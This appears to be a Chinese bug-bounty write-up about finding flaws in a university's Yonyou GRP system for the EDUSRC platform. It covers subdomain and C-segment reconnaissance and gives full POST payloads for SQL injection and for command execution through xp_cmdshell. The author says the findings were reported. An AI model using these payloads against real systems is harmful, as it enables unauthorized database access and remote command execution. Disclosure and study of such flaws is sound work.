记如何简单的挖掘edusrc
记如何简单的挖掘edusrc
文章来源:先知社区(满腔热血付于海)
原文地址:https://xz.aliyun.com/t/10310
0x01 前言
闲来没事,突然想到能不能挖一手edu的漏洞,打开edusrc高校排行榜随机抽取了一位幸运儿,然后开始对此开始测试。
0x02 信息搜集
第一步肯定是信息收集,比较懒直接就收集子域名,什么whoami,资产,CDN管都不管,开启oneforall就是开干。
兴高采烈地的打开扫完的文档,怎么就这几个站点,这下难住了
一个一个网站测试过去,都没有很好的结果,都是一些危害较低的。仔细想想,又回来信息收集,收集一手c段。
完美成功的拿下了c段,现在就是测试有没有c段的网站了,利用fofa语法搜索
ip="X.X.X.0/24" && status_code="200"
一个一个的网段测试下来,终于找到一个脆弱的站点了,打开一看是用友的GRP
百度搜索一下有没有可以利用的漏洞,发现还是有很多的漏洞的
0x03 漏洞验证与利用
开始检测漏洞,经过验证发现存在SQL注入和RCE,美滋滋又是一个高危。通过hackbar POST方式提交
cVer=9.8.0&dp=<r9packet version="1"><dataformat>XMLdataformat> <r9function> <name> AS_DataRequest name > <params> <param> <name> ProviderName name > <data format="text"> DataSetProviderData data > <param> <name> Data name > <data format="text"> select db_name() data > params > r9function > r9packet >
然后burp抓包,发送到重放器中
nice,成功爆出数据库的名字,不过只是中危,接下来尝试能不能RCE。同样通过hackbar POST方式提交
cVer=9.8.0&dp=<r9packet version="1"><dataformat>XMLdataformat> <r9function> <name> AS_DataRequest name > <params> <param> <name> ProviderName name > <data format="text"> DataSetProviderData data > <param> <name> Data name > <data format="text"> exec xp_cmdshell 'whoami' data > params > r9function > r9packet >
然后burp抓包,发送到重放器中
成功执行,拿下一个高危!
0x04 结尾
漏洞当前已经上交edusrc,挖掘的没什么特别难的地方,漏洞也都是复现网上的,最主要的是信息收集,收集的地址越多,能够拿下高危的机会也就越大(大佬除外)。
总的来说就是信息收集找寻脆弱站点,然后利用网上公布相同系统的漏洞进行利用。